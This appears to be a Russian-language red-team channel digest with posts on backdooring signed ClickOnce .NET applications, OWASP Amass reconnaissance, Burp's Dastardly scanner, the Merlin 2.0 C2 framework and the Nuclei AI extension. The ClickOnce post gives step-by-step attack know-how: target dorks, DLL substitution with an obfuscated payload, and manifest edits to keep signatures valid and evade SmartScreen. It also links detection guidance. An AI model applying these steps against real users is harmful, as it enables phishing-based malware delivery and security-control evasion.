По структуре application/appref-ms представляют собой:
✅ deployment manifest (файл *.application) - определяет откуда необходимо загрузить зависимости и application manifest
✅ application manifest (файл *.exe.manifest) - информация о UAC, Identity, Name, ico и необходимых зависимостях
✅ application (embedded) manifest - само приложение

В докладе представлен метод, как можно пробэкдорить подписанное ClickOnce (точнее зависимости) сохранив подпись валидной для обхода Smart Screen.

🔴 Ищем приложение подходящее под претекст нашего фишинга:
Bing Dorks: inbody:"ClickOnce and .NET Framework Resources" AND filetype:html
Shodan Dorks: ClickOnceInfo Text
Github Dorks: clickonce extension:manifest
Tools:
https://github.com/zyn3rgy/ClickonceHunter
https://github.com/0xthirteen/AssemblyHunter
https://github.com/api0cradle/RedTeamScripts#application_downloaderpy
🔴 Приложение должно соответствовать требованиям: UAC settings: asInvoker, PublicKeyToken=null, No Aplication Manifest Identity
🔴 Находим зависимости в манифесте, которые можно подменить (non-strongly versioned DLL)
🔴 Бэкдорим приложение "полезной" dll (DInvoke PE manual mapper+ILMerge+ConfuserEx 2)
🔴Собираем .application обратно
Необходимо добавить новое значение SHA256 и размер "полезной" dll в dsig:DigestValue и size в deployment manifest
Удалить значения "publisherIdentity” и "Signature" и перезаписать значение publicKeyToken="0000000000000000" 16-ю нолями или "null" в "asmv1:assemblyIdentity"
Важно не забыть добавить новое значение SHA256 и размер deployment manifest в dsig:DigestValue и size в файле application manifest

❓Что делать:
🔴 Атакующим:  Подробный writeup - https://infosecwriteups.com/backdooring-clickonce-net-for-initial-access-a-practical-example-1eb6863c0579
🔵 Защитникам: Detection/Prevention - в конце презентации (54-56 слайды) https://disk.yandex.ru/i/JpIoxdEf6B4ctg

Читать полностью…

Unlocking the Power of OWASP Amass

Мы уже не раз обсуждали коммерческие платформы Attack Surface Managment, которые обычно используются для инвентаризации внешних активов больших компаний. Но эти инструменты не всегда являются оптимальным решением для баг-хантеров и пентестеров, так как обычно имеют определенные ограничения на бесплатном уровне подписки, поэтому остается либо платить за полную функциональность, либо создать собственную платформу с блекджеком и своей подпиской использовать скрипты с перекладываниями файликов output.txt из одной утилиты в другую.

На канале уважаемого Валерия Шевченко aka krevetk0 я натолкнулся на пост с рекомендацией доклада Jeff Foley - автора Amass с DEFCON 31 (продолжительность ~30 мин), посмотрев который вы узнаете как оптимизировать свои recon-скрипты😎

Краткое содержание доклада:
✅ Про концепцию Open Asset Model (OAM) - стандарт модели определяющей типы активов (FQDN домены, ip адреса, CIDR и пр) которые хранятся в json в SQL базе данных Amass
✅ Amass умеет в PostgreSQL
✅ Можно формировать SQL запросы коррелирующие взаимосвязь между типами активов для дальнейшей автоматизации. На примере не просто: amass db -dir bugbounty -d my_target.ru -enum 1 -show, а как на первом скрине⬆️
✅ На данный момент они пилят Amass Collection Engine, архитектура на втором скрине⬆️
✅ OWASP крутые!👍

#attack_surface_management #subdomain_enum #external_pentest #bug_bounty

Читать полностью…

Dastardly - free lightweight CI/CD DAST scanner from Burp Suite

Portswigger представили Dastardly - бесплатный DAST сканер веб уязвимостей, на базе того же scanning engine, который используется в Burp Suite Professional/Enterprise версиях.

Dastardly представляет собой docker контейнер, который можно легко интегрировать в любой CI/CD пайплайн или пайплан автоматизированного сканирования или просто использовать как отдельный инструмент.

docker run --user $(id -u) --rm -v $(pwd):/dastardly -e \
BURP_START_URL=https://target.com -e \
BURP_REPORT_FILE_PATH=/dastardly/dastardly-report.xml \
public.ecr.aws/portswigger/dastardly:latest

На данный момент умеет искать:
✅ Cross-site scripting (XSS) (reflected)
✅ Cross-origin resource sharing (CORS) issues
✅ Vulnerable JavaScript dependency
✅ Content type is not specified
✅ Multiple content types specified
✅ HTML does not specify charset
✅ Duplicate cookies set

На выходе получается отчет в JUnit XML, который содержит детали найденной уязвимости, уровень критичности (info, low, medium, high) и ссылки на рекомендации Web Security Academy

Читать полностью…

Merlin’s Evolution: : Multi-Operator CLI and Peer-to-Peer Magic

В этой заметке речь пойдет про придворного волшебника короля Артура один из первых opensource С2 который мы стали использовать в своей практике. Поэтому я испытал нотки легкой ностальгии🥲, когда увидел, что пару недель назад вышла версия Merlin 2.0, о новой функциональности которой хотел сегодня рассказать:

🔴 Multi-Operator CLI
Взаимодействие CLI с C2 сервером по gRPC с возможностью использования mTLS. Возможность командного взаимодействия вообще, по моему мнению одна из ключевых особенностей современных С2 фреймворков, которой не хватало Merlin. Хотя моменты, когда столпившись в офисе у монитора оператора мы всей командой ждали появления долгожданного шелла, навевают приятные воспоминания.
🔴 Peer-to-Peer Agent communications over SMB, TCP, UDP (bind/reverse).
P2P взаимодействие c агентами с OPAQUE Authentication и возможности конфигурации безопасной (encoded and encrypted) коммуникации (transforms): aes, base64-byte, base64-string, hex-byte, hex-string, gob-base, gob-string, jwe, rc4,  xor.
🔴 Structured logging in JSON format to STDOUT.
Логирование действий с возможностью экспорта тоже очень ценная функциональность, об отсутствии которой обычно вспоминают только, когда через несколько месяцев после проекта у заказчика неожиданно возникает необходимость что-нибудь срочно вспомнить🙈
🔴 Miscellaneous
Структура позволяющая легко кастомизировать функциональность агента (добавить новые команды), развернутая аннотация по командам агента (описание, примеры использования и пр), документация.

Таким образом, новая функциональность Merlin 2.0 определенно заслуживает внимания и нуждается в тестировании на практике.
PS: Может так и TrevorС2 когда-нибудь реинкарнируют, чтобы олдскулы совсем свело ностальгией😂 Желаю всем удачного окончания рабочей недели и хороших выходных!

#red_teaming #merlin_C2

Читать полностью…

Nuclei AI — Browser Extension

Недавно вышел релиз Nuclei v3, а следом ребята из Project Discovery выпустили Nuclei AI - расширение для браузера для создания темплейтов с помощью искусственного интеллекта на основе текста с описанием уязвимости🤪

🔴 Необходимо зарегать бесплатный аккаунт на cloud.projectdiscovery.io
🔴 Аутентифицироваться с этой учеткой в Сhrome, в котором планируете использовать расширение Nuclei AI
🔴 Установить расширение, следуя инструкции на github
🔴 Выделить текст описания уязвимости из отчета на H1, баги на ExploitDB, поста в twitter и пр.
🔴 В контекстном меню нажать кнопочку Generate
🔴 AI Magic🔮
🔴 Сохранить и использовать сгенерированный шаблон (шаблоны автоматически сохраняются в профиле на cloud.projectdiscovery.io)

Немного поигравшись с расширением в рандомных постах исследователей в twitter и POC'ами из отчетов на HackerOne - подтверждаю, оно действительно работает и генерирует работоспособные темплейты для Nuclei🎉

Читать полностью…